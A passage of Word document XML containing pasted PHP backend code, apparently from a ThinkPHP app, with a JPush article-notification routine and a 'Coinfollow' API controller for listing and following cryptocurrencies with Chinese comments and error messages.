    <w:p w14:paraId="056CFB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curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EE13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$totalline = curl_exec($curl); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08719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(curl_errno($curl)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BE44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'Errno'.curl_error($curl);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295863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DB2D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curl_close($curl); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7976F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$totalline; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644B29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274C3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_content($a){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447560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strip_tags($a);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6609AD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return $a;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C622C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6418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push(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FBD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config()['apicloud'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702E23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if(!$config['push'] || $config['push'] == 0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350DD4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EA04E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6FB50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$where['hide']      =   1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425ABC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$where['title']     =   ['&lt;&gt;',''];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF4C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$where['weitoutiao']=   0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239EEF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$where['mychannel'] =   ['in','1,2,3'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23498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$config['push_time'] = empty($config['push_time']) ? 0 : $config['push_time'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578043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$time=date('Y-m-d' , strtotime("-".$config['push_time']." day"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB945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$where['create_time'] = $aidwhere['time'] = ['&gt; time',$time];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B446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$aidwhere['aid'] = ['&lt;&gt;',''];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230893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if($config['redian']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B05B2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$where['flags'] =   2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4499D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C322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 = Db::name('push')-&gt;where($aidwhere)-&gt;field('aid')-&gt;order('id desc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221FD6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($aid as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A63CF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$aida[] = $v['aid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222A70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2544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if($aid){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCD3B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$where['id']    =   ['not in',$aida];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65828E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A4BC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Db::name('article')-&gt;where($where)-&gt;field('id,title,description,mychannel,create_time,content,video')-&gt;order('rand()')-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EADF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$post['content']    =   $post['description'] ? $post['description'] : $this-&gt;_content($post['content']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B80CD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 = config()['apicloud'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4748BB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$client = new JPush($config['app_key'], $config['master_secret']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6050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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26066A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 = $client-&gt;push();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F339C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$response-&gt;setPlatform(['ios','android']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0CF0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$response-&gt;addAllAudience(); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6516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$response-&gt;androidNotification($post['content'], array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2897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 =&gt; $post['title'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323AB2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'extras' =&gt; [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F08F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=&gt;  $post['mychannel'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C70F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=&gt;  $post['id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAEDE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     =&gt;  _imgUrl().$post['video'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119E17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9002D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16EBFF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$response-&gt;iosNotification($post['title'], array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BF56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'extras' =&gt; [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257289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'mychannel' =&gt;  $post['mychannel'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3615FE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=&gt;  $post['id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E117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'video'     =&gt;  _imgUrl().$post['video'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4792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D00F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p>
    <w:p w14:paraId="66F0E2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$response-&gt;options(['apns_production'=&gt;true]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42359E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$response-&gt;send();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFC6A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if(!empty($url['http_code']) &amp;&amp; $url['http_code'] == 200){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779A28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701ACF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    =   $post['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F947B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$data['type']   =   2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6288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$data['platform']   =   0; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751A0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Db::name('push')-&gt;insert($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EB96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json(['(id:'.$post['id'].')'.$post['title'].'|msg_id:'.$url['body']['msg_id'].'|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>推送成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FE15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899EA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json($url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B79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22031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(\JPush\Exceptions\APIConnectionException $e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DDE0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1807CD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catch (\JPush\Exceptions\APIRequestException $e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7503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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1E9F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3DE3E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700CAC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$this-&gt;html('https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3139850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$url = json_decode($url,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B1D6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dump($url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8B69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if($url['status'] == 1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524A9A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$data['time']   =   time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13089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$data['aid']    =   $post['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8C14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Db::name('push')-&gt;insert($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B06C5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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>推送成功，</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分钟内生效</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD4A9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27F3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推送失败！</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15ED7D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F3D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96F2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CD555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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5049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762008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app\api\controller\Common;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4603D8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1CA0DC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think\Session;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62363F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think\Request;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563D909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12E133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Qiniu\Auth as Auth;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64710C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Qiniu\Storage\UploadManager;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FED4E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set_time_limit(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE2AB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Coinfollow extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDB51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7C064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 = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADB0A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$memberId = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103C8D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E1744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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>架构函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB0F0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F58C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@param Request $request Request</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522632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7D05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@access public</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D383B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5E3D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__construct(Request $request = null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077295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EDCB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parent::__construct($request);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB283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 = input('param.token', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7CD0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($token != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585C71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$member_id = _decrypt($token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D81D4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($member_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CB16C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$this-&gt;memberId = $member_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12367C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_user($member_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5440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($member) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E49B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1D39D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4F1236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08C54F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1491F7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC860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无法登录，原因是当前账户已被封号</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28220C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223,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D376E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8CA2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30C3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1BB9C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556F41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283B25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007ED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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B29B3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当前账户正在审核中，请等待客服处理</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CF37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224,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D923F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90D1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4B04A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7A1C1B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234AE5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 = _records($member['id'], 'API</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>操作，账户审核被拒绝</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4FCE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($recording) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA576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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CB8A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账户审核被拒绝，拒绝原因：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' . $member['hidetent'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708311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225,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F55E9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DF953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0125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40D6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1206F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746BB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B26A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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该用户不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B9AB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221,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFF93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C8E9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BA3CF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 = $member;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066ADC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4C992A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF9DB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'err' =&gt; 'Token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不正确，请重新获取</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Token',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7776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581B56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BD7AF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8471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500DF4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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4262F8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 =&gt; 'Token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F1C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'errcode' =&gt; 222,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B99E9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9DBE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0B3C9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4B96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index()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD7E6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7AC57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exit(json_encode(_ajaxError()));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799DC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0A6D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192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/api/coinfollow/lists </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取用户关注虚拟币列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BC2E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获取用户关注虚拟币列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75637D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04C6C6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8B8E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@apiUse MyPages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493305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Token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>必填</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456DA7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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABCB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quote     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>报价货币，必填，建议使用</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>USDT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F073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{Object} data </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>实时行情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7C7C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data.exchange </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易所</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C5A0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data.symbol      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易对</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB985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data.update_time </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时间日期，格式毫秒时间戳</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043B78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data.last_price  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最新价格</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7898C8B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data.change      24</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>小时价格变动</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18582B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data.percentage  24</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>小时价格变动百分比</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098FA1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data.base_volume 24</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>小时内基准货币交易量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663475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data.quote_volume 24</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>小时内报价货币交易量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05806E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data.icon </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币图标</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1485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data.currency </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D46A7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8F1F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lists()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC6E2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DB6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validate('Page');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD12D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32C766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26C6D5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0A7D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 = input('param.pages');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7126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$quote = input('param.quote', 'USDT');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DEDF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_user($this-&gt;memberId);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5238E9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$follows_where['member_id'] = $member['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C53C6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$follows=Db::name('member_coin')-&gt;order('create_time desc')-&gt;where($follows_where)-&gt;paginate($pages)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F38C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if(empty($follows['data']))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6775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json($follows);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1223D2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$coins_where['id'] = ['in', array_column($follows['data'], 'coin_id')];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0357E3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$coins=Db::name('coin')-&gt;where($coins_where)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD05B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$attach_coin=function($follow) use ($coins) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4505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$index=array_search($follow['coin_id'], array_column($coins, 'id'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE6B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if(false===$index)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4CFF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$follow;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF074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5B54C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$follow + $coins[$index];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174492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A9CE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$follows['data']=array_map($attach_coin, $follows['data']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5966B6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$arr = array_column($coins, 'currency');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547998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$symbol_merge = function ($base) use ($quote) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D1E3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"$base/$quote";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0EBE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A31F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 = array_map($symbol_merge, $arr);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F70A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$pre_query=Db::name('ticker')-&gt;field('batch_no')-&gt;order('ticker_timestamp desc')-&gt;limit(1)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4D4C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#$ticker_where['exchange'] = $id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166BF0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$ticker_where['symbol'] = ['in', $symbol];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E72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$ticker_where['batch_no'] = $pre_query['batch_no'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5E3A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$tickers=Db::name('ticker')-&gt;order('ticker_timestamp desc')-&gt;where($ticker_where)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE985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$attach_icon=function($coin){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A87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$coin['icon']= config()['appConfig']['prod_url'].'/public/coin/icon/' . strtolower($coin['currency']) . '@2x.png';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C144C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B715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7C923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$follows['data']=array_map($attach_icon, $follows['data']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A54DF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$attach_ticker=function($coin) use ($tickers, $quote) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4508AA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$symbol=$coin['currency'] . '/' .$quote;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78903B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$ticker=array_search($symbol, array_column($tickers, 'symbol'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5056CF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if(false===$ticker)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5BB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 + ['symbol'=&gt;$symbol, 'last_price'=&gt;0, 'change'=&gt;0, 'percentage'=&gt;0, 'base_volume'=&gt;0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33193D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A4C11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$coin + $tickers[$ticker];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03500E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5BEF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$follows['data']=array_map($attach_ticker, $follows['data']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F04C6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json($follows);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65462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D46F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6D3F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/api/coinfollow/follow </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会员关注虚拟币</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF60A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会员关注虚拟币</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1604BF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4F2EC3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02142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270341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coin_id  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F9F4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A1E82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follow()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F88B4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A739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#$coin_id=input('param.coin_id') ? input('param.coin_id') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502FAF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 = Db::name('coin')-&gt;where('id', input('param.coin_id'))-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506114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($coin) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37628F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$member = _user($this-&gt;memberId);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B19C8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 Db::name('member_coin')-&gt;where('member_id', $member['id'])-&gt;where('coin_id', $coin['id'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073BCB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(!$ret) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF552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$member_coin = ['member_id' =&gt; $member['id'], 'coin_id' =&gt; $coin['id'], 'create_time' =&gt; time()];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D719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Db::name('member_coin')-&gt;insert($member_coin);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D121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Db::name('coin')-&gt;where('id', $coin['id'])-&gt;setInc('follow_num', 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F454B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D637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关注成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
